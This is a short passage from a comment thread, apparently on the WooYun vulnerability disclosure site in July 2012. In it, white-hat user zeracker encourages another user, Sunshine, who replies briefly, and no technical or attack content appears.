  19. 2012-07-09 15:24 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @Sunshine 一个人,乌云不是一个人在战斗

  20. 2012-07-10 14:06 | Sunshine ( 实习白帽子 | Rank:51 漏洞数:10 | Nothing.)

    @zeracker 明白、